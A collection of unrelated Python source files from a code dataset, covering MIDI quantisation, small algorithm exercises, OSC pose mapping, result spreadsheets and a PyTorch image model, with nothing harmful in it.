self.midiMessages[note]['starttick'] % ticksForQuantization\r\n\r\n if ( mod != 0 ) : # if note does not start on a quantized note\r\n if ( mod >= ticksForQuantization/2 ) : \r\n self.midiMessages[note]['starttick'] = int((div + 1 ) * ticksForQuantization )\r\n else : \r\n self.midiMessages[note]['starttick'] = int( div * ticksForQuantization )\r\n\r\n self.midiMessages[note]['endtick'] = int(self.midiMessages[note]['starttick'] + self.midiMessages[note]['duration'])\r\n self.midiMessages[note]['measure'] = int( self.midiMessages[note]['starttick'] / self.tsInfo['measureLength'] ) + 1\r\n self.midiMessages[note]['measureGranularity'] = round ( ( float(self.midiMessages[note]['starttick']) / self.tsInfo['measureLength'] ) + 1, 2 ) \r\n\r\n \r\n print() \r\n for note in self.midiMessages : \r\n print ( note, self.midiMessages[note]['pitch'], self.midiMessages[note]['starttick'], self.midiMessages[note]['endtick'], self.midiMessages[note]['granularity'], \r\n self.midiMessages[note]['tie'], self.midiMessages[note]['velocity'], self.midiMessages[note]['duration'], self.midiMessages[note]['measure'], \r\n self.midiMessages[note]['measureGranularity'], \r\n )\r\n\r\n \r\n\r\n\r\n def createMidi ( self ) :\r\n\r\n # create notes from self.midiMessages\r\n notes = {} \r\n cnt = 0 \r\n for note in self.midiMessages : \r\n pitch = self.midiMessages[note]['pitch']\r\n starttick = self.midiMessages[note]['starttick']\r\n endtick = self.midiMessages[note]['endtick']\r\n octave = pitch // 12\r\n mod = pitch % 12\r\n notestr = MusicTheory.pitchToNotes[mod]\r\n velocity = self.midiMessages[note]['velocity']\r\n notes[cnt] = { 'event': 'on', 'notestr': notestr, 'octave': octave, 'starttick': starttick, 'velocity': velocity, 'pitch': pitch }\r\n cnt += 1\r\n notes[cnt] = { 'event': 'off', 'notestr': notestr, 'octave': octave, 'starttick': endtick, 'velocity': 0, 'pitch': pitch }\r\n cnt += 1\r\n\r\n\r\n notes = collections.OrderedDict ( sorted ( notes.items(), key=lambda x : x[1]['starttick'] ) ) \r\n\r\n glbClk = 0 \r\n print() \r\n for key in notes : \r\n notes[key]['miditick'] = notes[key]['starttick'] - glbClk \r\n glbClk = notes[key]['starttick'] \r\n print ( key, notes[key]['notestr'], notes[key]['event'], notes[key]['miditick'], notes[key]['pitch'] ) \r\n\r\n\r\n fmt = 0\r\n fname = \"midi_export\" \r\n fnamePy = fname + \".py\" \r\n fout = open ( fnamePy, \"w\" ) \r\n\r\n fout.write ( \"import midi\\n\" ) ;\r\n fout.write ( \"# Instantiate a MIDI Pattern (contains a list of tracks)\\n\" ) ;\r\n fout.write ( \"pattern = midi.Pattern(format=%d, resolution=%d)\\n\" %(fmt, self.tsInfo['resolution']) ) ;\r\n fout.write ( \"# Instantiate a MIDI Track (contains a list of MIDI events)\\n\" ) ;\r\n fout.write ( \"track = midi.Track()\\n\" ) ;\r\n fout.write ( \"# Append the track to the pattern\\n\" ) ;\r\n fout.write ( \"pattern.append(track)\\n\" ) ;\r\n fout.write (\"# Midi Events Start Here\" ) ;\r\n fout.write ( \"\\n\" ) ;\r\n fout.write (\"# Instantiate a MIDI note on event, append it to the track\\n\" ) ;\r\n fout.write ( \"\\n\" ) ;\r\n\r\n tsDenominatorPow = int(math.log ( self.tsInfo['tsDenominator'], 2 )) ;\r\n string = \"time = midi.TimeSignatureEvent(tick=0, \" + \"data = [\" + str(self.tsInfo['tsNumerator']) + \", \" + str(tsDenominatorPow) + \", 24, 8])\" + \"\\n\" ; # 240 bpm\r\n fout.write ( string ) ;\r\n fout.write ( \"track.append(time)\\n\" ) \r\n\r\n for i in notes : \r\n \r\n pitch = notes[i]['notestr'] + \"_\" + str(notes[i]['octave'])\r\n tick = notes[i]['miditick']\r\n velocity = notes[i]['velocity']\r\n \r\n if ( notes[i]['event'] == 'on' ) : \r\n string = \"on = midi.NoteOnEvent(tick=\" + str( tick ) + \", velocity=\" + str(velocity) + \", pitch=midi.\" + pitch + \")\\n\" \r\n fout.write ( string ) ;\r\n fout.write ( \"track.append(on)\\n\" ) \r\n\r\n else : \r\n\r\n string = \"off = midi.NoteOffEvent(tick=\" + str( tick ) + \", velocity=\" + str(velocity) + \", pitch=midi.\" + pitch + \")\\n\" \r\n fout.write ( string ) ;\r\n fout.write ( \"track.append(off)\\n\" ) \r\n \r\n\r\n #print ( i, pitch, tick, velocity ) \r\n\r\n\r\n fout.write ( \"\\n\" ) ;\r\n fout.write (\"\\neot = midi.EndOfTrackEvent(tick=1)\" ) ;\r\n fout.write (\"\\ntrack.append(eot)\" ) ;\r\n fout.write ( \"\\n# Print out the pattern\" ) ;\r\n fout.write ( \"\\n#print pattern\" ) ;\r\n # Save the pattern to disk\r\n \r\n fout_name = fname + \".mid\" ;\r\n fout.write ( \"\\nmidi.write_midifile(\\\"%s\\\", pattern)\" %(fout_name) ) ;\r\n \r\n fout.close() ;\r\n\r\n call = \"python \" + fnamePy \r\n print ( call ) \r\n os.system ( call ) ;\r\n\r\n\r\n\r\n def generateStartAndEndTimes ( self ) : \r\n\r\n\r\n cnt = 0 \r\n length = len(self.messagesFromMidiInstrument) \r\n for note in self.messagesFromMidiInstrument : \r\n \r\n if ( self.messagesFromMidiInstrument[note]['event'] == 'note_off' ) : # ignore note off events\r\n continue\r\n\r\n for offnote in range ( note+1, length, 1 ) : \r\n \r\n if ( self.messagesFromMidiInstrument[offnote]['event'] == 'note_on' ) : # ignore note on events\r\n continue\r\n \r\n if ( self.messagesFromMidiInstrument[note]['pitch'] == self.messagesFromMidiInstrument[offnote]['pitch'] ) : \r\n\r\n self.midiMessages[cnt] = { 'pitch' : self.messagesFromMidiInstrument[note]['pitch'], \r\n 'starttick' : int(self.messagesFromMidiInstrument[note]['starttick']) ,\r\n 'endtick' : int(self.messagesFromMidiInstrument[offnote]['starttick']) , \r\n 'granularity' : 1, \r\n 'tie' : 0.00,\r\n 'velocity' : self.messagesFromMidiInstrument[note]['velocity'],\r\n 'duration' : int(self.messagesFromMidiInstrument[offnote]['starttick'] - self.messagesFromMidiInstrument[note]['starttick']),\r\n 'measure' : int( self.messagesFromMidiInstrument[note]['starttick'] / self.tsInfo['measureLength'] ) + 1,\r\n 'measureGranularity': round ( ( float(self.messagesFromMidiInstrument[note]['starttick']) / self.tsInfo['measureLength'] ) + 1, 2 ) , \r\n }\r\n cnt += 1\r\n break \r\n\r\n\r\n\r\n print() \r\n for note in self.midiMessages : \r\n \r\n print ( note,\r\n self.midiMessages[note]['pitch'], \r\n self.midiMessages[note]['starttick'],\r\n self.midiMessages[note]['endtick'], \r\n self.midiMessages[note]['granularity'], \r\n self.midiMessages[note]['tie'], \r\n self.midiMessages[note]['velocity'], \r\n self.midiMessages[note]['duration'], \r\n self.midiMessages[note]['measure'], \r\n self.midiMessages[note]['measureGranularity'],\r\n \r\n )\r\n\r\n\r\n\r\n#import djwatson_api\r\n#from djwatson_io import Note, Const\r\n\r\ncurrent_milli_time = lambda: int(round(time.time() * 1000000))\r\n\r\n\r\nclass PushMidiMessages(threading.Thread):\r\n def __init__(self, flushIntervalInSec):\r\n super(PushMidiMessages, self).__init__()\r\n\r\n #self.queue = RecordQueue()\r\n self.kill_received = False\r\n self.flushTrigger = None\r\n self.flushIntervalInSec = flushIntervalInSec\r\n\r\n def run(self):\r\n\r\n\r\n for msg in inport: # nonblocking; flush out buffered msgs and return immediately\r\n\r\n # if self.flushTrigger == None and (msg.type == 'note_on' or msg.type == 'note_off'):\r\n # self.flushTrigger = FlushTrigger(self.queue, self.flushIntervalInSec)\r\n # self.flushTrigger.start()\r\n\r\n# self.queue.lock.acquire()\r\n #print ( msg ) \r\n\r\n if msg.type == 'note_on':\r\n# if firstMsgTime == 0:\r\n# firstMsgTime = msg.time\r\n\r\n #self.queue.pushNote(msg.note, convertMsgTimeToTick(msg.time), msg.velocity)\r\n print(\"note on:\" , msg.note, \"time: \", msg.time, \"velocity: \" , msg.velocity)\r\n\r\n elif msg.type == 'note_off':\r\n print(\"note off:\" , msg.note, \"time: \", msg.time, \"velocity: \" , msg.velocity)\r\n\r\n #self.queue.releaseNote(msg.note, convertMsgTimeToTick(msg.time))\r\n\r\n# self.queue.lock.release()\r\n#\r\n# if (msg.type == 'note_on' or msg.type == 'note_off') and self.flushTrigger.trigger == True:\r\n# if self.flushTrigger.pendingTrigger == True:\r\n# self.flushTrigger.attemptFlush()\r\n# else:\r\n# self.flushTrigger = None\r\n\r\n\r\n\r\nif __name__ == '__main__' :\r\n\r\n\r\n\r\n\r\n quarternotePerMin = 75\r\n ticksPerQuarterNote = 480\r\n msgInterval = 240 # in # of ticks\r\n firstMsgTime = 0 # in seconds; will be set at the first note\r\n flushIntervalInSec = 3.0\r\n \r\n note_min = 21\r\n note_max = 108\r\n \r\n \r\n ticksPerTie = 240\r\n ticksPerPush = ticksPerTie * 10\r\n \r\n firstMsgTime = 0 \r\n milliSecPerTick = 60000.0 / quarternotePerMin / ticksPerQuarterNote\r\n\r\n\r\n midi = RecordMidi() \r\n midi.run() \r\n\r\n\r\n sys.exit(0) \r\n\r\n\r\n\r\n mido.set_backend('mido.backends.rtmidi')\r\n inport = mido.open_input()\r\n\r\n\r\n try:\r\n with mido.open_input() as port:\r\n print('Using {}'.format(port))\r\n print('Waiting for messages...')\r\n for message in port:\r\n print ( message.type, message.time, message.note, message.velocity ) \r\n #print('Received {}'.format(message))\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n sys.exit(0) \r\n\r\n\r\n\r\n\r\n threads = []\r\n # pushMidi = PushMidiMessages(Const.flushIntervalInSec)\r\n pushMidi = PushMidiMessages(3.0)\r\n pushMidi.daemon = True\r\n\r\n threads.append(pushMidi)\r\n\r\n pushMidi.start()\r\n\r\n while True:\r\n try:\r\n pushMidi.join(1)\r\n # for t in threads:\r\n # if t.is_alive():\r\n # # print('joining thread: '+str(t))\r\n # t.join(1)\r\n except KeyboardInterrupt:\r\n # for t in threads:\r\n # t.kill_received = True\r\n break\r\n","sub_path":"src/DevServer/midi_input.py","file_name":"midi_input.py","file_ext":"py","file_size_in_byte":18108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11324834","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 07:56:28 2017\n\n@author: Administrator\n\"\"\"\n\ndef findMaximumXOR(nums):\n maxRes=0\n mask=0\n for i in range(5,-1,-1):\n #/The mask will grow like 100..000 , 110..000, 111..000,then 1111...111\n mask=mask|(1< c:\n if c < (a_b >> 1):\n return 0\n return c - ((a_b - 1) >> 1)\n return a_b >> 1\n\n\ndef main():\n pairs = []\n for a in range(1, 1000):\n for trio in euler.pythagorean_unique_trio(a):\n pairs.extend((trio[:2], trio[1::-1]))\n pairs.sort()\n count = 0\n c = 0\n while True:\n c += 1\n for pair in pairs:\n if pair[0] > c:\n break\n if c % pair[0] == 0:\n d = c // pair[0]\n count += count_of_c(c, pair[1] * d)\n if count > LIMIT:\n return c\n\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"python/problem86.py","file_name":"problem86.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"490461173","text":"from pythonosc.dispatcher import Dispatcher\nfrom pythonosc.osc_server import BlockingOSCUDPServer\nfrom pythonosc.udp_client import SimpleUDPClient\nfrom functools import partial\nimport time\nimport math\n\nip = \"127.0.0.1\"\nport = 6669\nclient = SimpleUDPClient(ip, port)\n\n# Constants\nparts = ['nose', 'leftEye', 'rightEye', 'leftEar', 'rightEar',\n 'leftShoulder', 'rightShoulder', 'leftElbow', 'rightElbow',\n 'leftWrist', 'rightWrist', 'leftHip', 'rightHip', 'leftKnee',\n 'rightKnee', 'leftAnkle', 'rightAnkle']\nnumparts = len(parts)\npart2idx = {p: i for i, p in enumerate(parts)}\nidx2part = {i: p for i, p in enumerate(parts)}\n\nparams = ['r_arm_height', 'l_arm_height']\n\n\ndef clamp(value, lower, upper):\n return lower if value < lower else upper if value > upper else value\n\n\ndef lerp(a, b, t):\n return (1.0 - t) * (a + b) * t\n\n\ndef inv_lerp(a, b, v):\n return (v - a) / (b - a)\n\n\ndef remap(in_range, out_range, v):\n t = inv_lerp(in_range[0], in_range[1], v)\n return lerp(out_range[0], out_range[1], t)\n\n\npose = {p: (-1, -1) for p in parts}\n\n\ndef update_pose(data):\n xp, yp = msg2data(data)\n for i, (x, y) in enumerate(zip(xp, yp)):\n if x > -1 and y > -1:\n pose[idx2part[i]] = (x, y)\n\n\ndef center_of_mass(pose):\n xp = [\n p[0] for p in [\n pose[part] for part in [\n \"leftShoulder\",\n \"rightShoulder\",\n \"leftHip\",\n \"rightHip\"]]]\n yp = [\n p[1] for p in [\n pose[part] for part in [\n \"leftShoulder\",\n \"rightShoulder\",\n \"leftHip\",\n \"rightHip\"]]]\n\n avgx = sum(xp) / 4\n avgy = sum(yp) / 4\n return avgx, avgy\n\n\ndef params_dict(pose):\n pdict = {}\n\n pdict[\"l_arm_height\"] = clamp(\n pose[\"leftWrist\"][1],\n pose[\"nose\"][1],\n pose[\"leftHip\"][1])\n pdict[\"l_arm_height\"] = inv_lerp(pose[\"nose\"][1],\n pose[\"leftHip\"][1],\n pdict[\"l_arm_height\"])\n return pdict\n\n\ndef writelns(filename, lines):\n with open(filename, 'a') as file:\n for line in lines:\n file.write(line + \"\\n\")\n\n\ndef handle_msg(addr, *args):\n update_pose(args)\n pose_param = params_dict(pose)\n client.send_message(\"/fs1/lpf\", [pose_param['l_arm_height'] + 300, 1])\n print(pose_param[\"l_arm_height\"])\n\n\ndef msg2data(args):\n x_points = [-1 for i in range(numparts)]\n y_points = [-1 for i in range(numparts)]\n for i in range(0, len(args), 3):\n part = args[i]\n\n x = float(args[i + 1])\n x_points[part2idx[part]] = x\n\n y = float(args[i + 2])\n y_points[part2idx[part]] = y\n\n return x_points, y_points\n\n\nif __name__ == \"__main__\":\n ip = \"127.0.0.1\"\n port = 6666\n\n dispatcher = Dispatcher()\n dispatcher.map(\"/pose/*\", handle_msg)\n # dispatcher.set_default_handler(println)\n\n # Blocking server ensures messages handled in order\n server = BlockingOSCUDPServer((ip, port), dispatcher)\n server.serve_forever()\n","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582313517","text":"import statistics\nfrom Cromossomo import Cromossomo\n\ndef salvar_dados(nome_arquivo,lista_resultado): \n precisao_casas_decimais = 6\n \n with open(nome_arquivo + \".csv\", \"w\") as arquivo:\n #Cabeçalho\n arquivo.write(\" \")\n for i in range(len(lista_resultado)):\n arquivo.write(\"Execucao\" + str(i+1) + \" \") \n arquivo.write(\"Media\"+ \" \")\n arquivo.write(\"Melhor\" + \" \")\n arquivo.write('\\n')\n\n #Conteudo\n for i in range(len(lista_resultado[0])):\n data = []\n arquivo.write(str(i + 1) + \" \")\n for lista in lista_resultado:\n particula_global = round(lista[i].get_aptidao(),4)\n particula_global = round(particula_global,precisao_casas_decimais)\n data.append(particula_global)\n arquivo.write(str(particula_global).replace('.',',') + \" \")\n\n lista = sorted(data , key=lambda t: t)\n \n #Media\n media = round(statistics.mean(data),4)\n arquivo.write(str(media).replace('.',',') + \" \")\n\n #Melhor\n menor = round(lista[0],4)\n arquivo.write(str(menor).replace('.',',') + \" \")\n\n # #xBest\n # xBest = lista[0].x_best\n # arquivo.write(str(xBest).replace('.',',') + \" \")\n\n arquivo.write('\\n')","sub_path":"persistencia.py","file_name":"persistencia.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610535537","text":"from sort_analyser import random_list_generator, measure_runtime, select_function\n\n\ndef menu():\n print(\"----------------------- Welcome to sorting algorithm analyser -----------------------\\n\")\n select_options()\n\n user_input = int(input(\"Enter option: \"))\n size = int(input(\"\\nEnter the size of list to be created: \"))\n maximum_num = int(input(\"Enter the maximum number to be created in the list: \"))\n print()\n run = select_function(user_input) # returns a sort function object\n\n while user_input != 0:\n if user_input == 1: # bubble sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 2: # insertion sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 3: # merge sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 4: # quick sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 5: # python's sorting function\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 6: # save user profile\n gen_list = random_list_generator(size, maximum_num) # generates array\n for functions in run:\n res = [measure_runtime(functions, gen_list)]\n return res\n\n select_options() # display a list of options for the user to choose from\n user_input = int(input(\"\\nSelect from the menu: \"))\n\n\ndef select_options():\n print(\"____________________________________\\n\"\n \"| 1. Bubble sort |\\n\"\n \"| 2. Insertion sort |\\n\"\n \"| 3. Merge sort |\\n\"\n \"| 4. Quick Sort |\\n\"\n \"| 5. Python's sorted Function |\\n\"\n \"| 6. Run all function |\\n\"\n \"| 0. Exit application |\\n\"\n \"|__________________________________|\")\n\n\nif __name__ == '__main__':\n menu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"91629307","text":"print()\n\nkata = input(\"Input: \")\ntemp = \"\"\n\nfor i in range(len(kata)-1, -1, -1): #Looping dari karakter / huruf terakhir\n temp+=kata[i]\n\nprint(\"Output: \", end=\"\")\nif(kata == temp): #Pengecekan kondisi dengan membandingkan kedua variabel\n print(\"True\")\nelse:\n print(\"False\")","sub_path":"nomor3.py","file_name":"nomor3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"47858755","text":"from directedNode import DirectedNode\n\nclass Field:\n # Field is a wrapper for a group of DirectedNode-s. Handles group resets, group steps, and retrieval of values at any point in space via inverse distance weighting.\n\n nodes = [ DirectedNode( 0.50, 0.75, 0.35, 0.65, 0.00, 0.00, 0.00 ),\n DirectedNode( 0.75, 1.00, 0.75, 1.00, 0.00, 1.00, 0.00 ),\n\n DirectedNode( 0.25, 0.50, 0.35, 0.65, 1.00, 0.00, 1.00 ),\n DirectedNode( 0.00, 0.25, 0.50, 0.75, 1.00, 1.00, 1.00 ),\n\n DirectedNode( 0.75, 1.00, 0.00, 0.50, 0.00, 0.50, 0.00 ),\n DirectedNode( 0.00, 0.25, 0.50, 1.00, 1.00, 0.50, 1.00 ) ]\n\n def reset( self ):\n # Basic, reset all nodes\n\n for node in self.nodes:\n node.reset( )\n\n def step( self, perc ):\n # Basic, step all nodes to same percent\n\n for node in self.nodes:\n node.step( perc )\n\n def getVal( self, x, y ):\n # This uses inverse distance weighting to compute the value at the point given\n\n v = 0 # Value accum\n d = 0 # Distance accum\n td = 0 # Temp variable to save some typing\n\n for node in self.nodes:\n\n # If distance == 0\n if ( x == node.x ) and ( y == node.y ):\n\n # Just break, the value will be equal to the (first encountered) node\n v = node.val;\n d = -1\n break\n\n else:\n\n # Calculate a distance\n td = 1.0 / pow( pow( node.x - x, 2 ) + pow( node.y - y, 2 ), 2 ) # 1/ r^4\n v += td * node.val\n d += td\n\n # If we are not on top of a point\n # NOTE: We use -1 as a flag because the distance to an even power will never be negative\n if d > 0:\n v /= d\n\n # Return value\n return v\n","sub_path":"field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"604054501","text":"\"\"\"\nExercise 6: Given the following two sets find the intersection and remove those elements from the first set\nExpected Output:\n\nFirst Set {65, 42, 78, 83, 23, 57, 29}\nSecond Set {67, 73, 43, 48, 83, 57, 29}\n\nIntersection is {57, 83, 29}\nFirst Set after removing common element {65, 42, 78, 23}\n\"\"\"\n\nfirst = {65, 42, 78, 83, 23, 57, 29}\nsecond = {67, 73, 43, 48, 83, 57, 29}\n\nin_first_but_no_in_second = first - second\n\nprint(in_first_but_no_in_second)\n\nintersection = first & second\nprint(intersection)\n\n# #############################\n\nfirstSet = {23, 42, 65, 57, 78, 83, 29}\nsecondSet = {57, 83, 29, 67, 73, 43, 48}\n\nprint(\"First Set \", firstSet)\nprint(\"Second Set \", secondSet)\n\nintersection = firstSet.intersection(secondSet)\nprint(\"Intersection is \", intersection)\nfor item in intersection:\n firstSet.remove(item)\n\nprint(\"First Set after removing common element \", firstSet)","sub_path":"pynative/6_datastructure/ex_6.py","file_name":"ex_6.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450865543","text":"from openpyxl import Workbook\nimport configparser\n\npar_list = [\n\"SensorName\",\n\"Temp\",\n\"Bias\",\n\"Resistance\",\n\"pulseArea\",\n\"pulseArea_Error\",\n\"Pmax\",\n\"Pmax_Error\",\n\"RMS\",\n\"RMS_Error\",\n\"Rise_Time\",\n\"Rise_Time_Error\",\n\"dvdt\",\n\"dvdt_Error\",\n\"FWHM\",\n\"FWHM_Error\",\n\"NewPulseArea\",\n\"NewPulseArea_Error\",\n\"FallTime\",\n\"FallTime_Error\"\n]\n\npar_dict = {\n\"SensorName\" : \"B\",\n\"Temp\" : \"G\",\n\"Bias\" : \"H\",\n\"Resistance\" : \"L\",\n\"pulseArea\" : \"J\",\n\"pulseArea_Error\" : \"K\",\n\"Pmax\" : \"R\",\n\"Pmax_Error\" : \"S\",\n\"RMS\" : \"T\",\n\"RMS_Error\" : \"U\",\n\"Rise_Time\" : \"Z\",\n\"Rise_Time_Error\" : \"AA\",\n\"dvdt\" : \"AB\",\n\"dvdt_Error\" : \"AC\",\n\"FWHM\" : \"AL\",\n\"FWHM_Error\" : \"AM\",\n\"NewPulseArea\" : \"CA\",\n\"NewPulseArea_Error\" : \"CB\",\n\"FallTime\" : \"DG\",\n\"FallTime_Error\" : \"DH\",\n\"cycle\" : \"F\"\n}\n\nconfig = configparser.ConfigParser()\nconfig.read(\"_results.ini\")\nconfig_section = config.sections()\nprint(config_section)\n\nwb = Workbook()\nws = wb.active\nrowCounter = 1\ndut_trig = [\"DUT\", \"Trig\"]\n\nRunNum = 100\nSensorName = \"Hi\"\nTemp = 20\nResistance = 4700\ntrigBias = 395\n\nfor ch in dut_trig:\n for bias in config_section:\n if ch in bias:\n if ch != \"Trig\":\n if \"..\" in bias:\n Bias = bias[bias.find(\"_\")+1:bias.find(\"V\")]\n cycle = bias.split(\"..\")[1]\n if \"_\" in cycle:\n cycle = cycle.split(\"_\")[0]\n else:\n Bias = bias[bias.find(\"_\")+1:bias.find(\"V\")]\n cycle = 1\n else:\n #Bias = trigBias\n try:\n Bias = config[bias][\"trigger_bias\"]\n if \"..\" in bias:\n cycle = bias.split(\"..\")[1]\n if \"_\" in cycle:\n cycle = cycle.split(\"_\")[0]\n else:\n cycle = 1\n except:\n Bias = -390\n cycle = 1\n for par in par_list:\n if (par == \"SensorName\"):\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = SensorName\n elif (par == \"Temp\"):\n try:\n Temp = config[bias][\"temperature\"]\n except:\n Temp = \"-30\"\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(Temp)\n elif (par == \"Bias\"):\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(Bias)\n if cycle:\n cell = par_dict[\"cycle\"] + str(rowCounter)\n ws[cell] = int(cycle)\n elif (par == \"Resistance\"):\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(Resistance)\n else:\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(config[bias][par])\n rowCounter+=1\n rowCounter+=1\n\nwb.save(\"_results.xlsx\")\n","sub_path":"scripts/betaScope_pyScript/parseBetaResultsToExcel.py","file_name":"parseBetaResultsToExcel.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"430876259","text":"\"\"\"\r\n5. Seja o mesmo texto acima “splitado”. Calcule quantas palavras possuem uma das letras “python” e que tenham mais de 4\r\ncaracteres. Não se esqueça de transformar maiúsculas para minúsculas e de remover antes os caracteres especiais.\r\n\"\"\"\r\n__author__ = 'Leonardo Vinicius Maciel aka Sephyros'\r\n\r\nstatement = \"The Python Software Foundation and the global Python community welcome and encourage participation by \" \\\r\n \"everyone. Our community is based on mutual respect, tolerance, and encouragement, and we are working to \" \\\r\n \"help each other live up to these principles. We want our community to be more diverse: whoever you are, \" \\\r\n \"and whatever your background, we welcome you.\"\r\ni = 0\r\nnew_statement = \"\"\r\nwhile i < len(statement):\r\n if statement[i] in \".,:\":\r\n new_statement += \"\"\r\n else:\r\n new_statement += statement[i]\r\n i += 1\r\npalavras = []\r\nquantidade = 0\r\nsequencia = \"python\"\r\nfor palavra in new_statement.split():\r\n palavra_ok = False\r\n for letra in palavra:\r\n if letra in sequencia:\r\n palavra_ok = True\r\n break\r\n if palavra_ok and palavra.lower() not in palavras:\r\n palavras.append(palavra.lower())\r\npalavras.sort()\r\nfor palavra in palavras:\r\n if len(palavra) > 4:\r\n quantidade += 1\r\nprint(\"Existem %d palavras únicas com uma das letras de %s\" % (quantidade, sequencia))","sub_path":"PingMind/Python para Zumbis/Lista IV/questao05.py","file_name":"questao05.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109469543","text":"import torch\nfrom .base_model import BaseModel\nfrom . import networks\nimport numpy as np\nimport os\n\n\nclass UnetResnetL2Model(BaseModel):\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n parser.set_defaults(norm='instance', norm_G='instance', netG='resnet_9blocks', dataset_mode='exr', input_nc=5, output_nc=2, preprocess='N.A.', image_type='exr', image_value_bound=26350, no_flip=True)\n parser.add_argument('--unet_residue', action='store_true', help='')\n parser.add_argument('--fixed_example', action='store_true', help='')\n parser.add_argument('--fixed_index', type=int, default=0, help='')\n parser.add_argument('--netU', type=str, default='unet_256')\n parser.add_argument('--unet_input_nc', type=int, default=3)\n parser.add_argument('--use_feature_extractor', action='store_true', help='')\n parser.add_argument('--break4', action='store_true', help='')\n return parser\n\n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n # specify the training losses you want to print out. The training/test scripts will call \n self.loss_names = ['D_L2', 'G_L2']\n # specify the images you want to save/display. The training/test scripts will call \n self.visual_names = ['real_A', 'post_unet', 'fake_B', 'real_B']\n # specify the models you want to save to the disk. The training/test scripts will call and \n self.model_names = ['G']\n if opt.use_feature_extractor: self.model_names += ['Feature']\n self.preload_names = ['U']\n # define networks\n self.netU = networks.define_G(opt.unet_input_nc, opt.output_nc, opt.ngf, opt.netU, opt.norm_G,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids, downsample_mode=opt.downsample_mode, upsample_mode=opt.upsample_mode, upsample_method=opt.upsample_method, linear=opt.linear)\n self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm_G,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids, downsample_mode=opt.downsample_mode, upsample_mode=opt.upsample_mode, upsample_method=opt.upsample_method, linear=opt.linear)\n if opt.use_feature_extractor:\n self.netFeature = networks.init_net(networks.FeatureExtractor(opt.output_nc), gpu_ids=self.gpu_ids)\n self.load_base_networks()\n\n if self.isTrain:\n # define loss functions\n self.criterionL2 = torch.nn.MSELoss()\n # initialize optimizers; schedulers will be automatically created by function .\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n if opt.use_feature_extractor:\n self.optimizer_Feature = torch.optim.Adam(self.netFeature.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_Feature)\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap images in domain A and domain B.\n \"\"\"\n AtoB = self.opt.direction == 'AtoB'\n self.real_A = input['A' if AtoB else 'B'].to(self.device)\n self.real_B = input['B' if AtoB else 'A'].to(self.device)\n self.real_B = 1 - torch.nn.ReLU()(2 - torch.nn.ReLU()(self.real_B + 1)) #clip to [-1, 1]\n self.image_paths = input['A_paths' if AtoB else 'B_paths']\n\n def forward(self):\n \"\"\"Run forward pass; called by both functions and .\"\"\"\n if self.opt.break4:\n self.real_A = self.break_into_4(self.real_A)\n self.real_B = self.break_into_4(self.real_B)\n self.post_unet = self.netU(self.real_A).detach()\n if self.opt.unet_residue:\n self.post_unet[:, 1, :, :] = self.post_unet[:, 1, :, :] + self.real_A[:, 0, :, :]\n self.fake_B = self.netG(torch.cat((self.real_A, self.post_unet), 1))\n self.fake_B = self.fake_B + self.post_unet\n\n def backward_D(self):\n if not self.opt.use_feature_extractor:\n self.loss_D_L2 = torch.zeros([1]).to(self.device)\n self.loss_D = self.loss_D_L2\n else:\n fake_B_features = self.netFeature(self.fake_B.detach())\n real_features = self.netFeature(self.real_B)\n self.loss_D_L2 = -self.criterionL2(fake_B_features, real_features) * 1000\n self.loss_D = -self.loss_D_L2 / self.loss_D_L2.item() * 2 / 1000\n self.loss_D.backward()\n\n def backward_G(self):\n self.loss_G_L2 = self.criterionL2(self.fake_B, self.real_B) * 1000\n if not 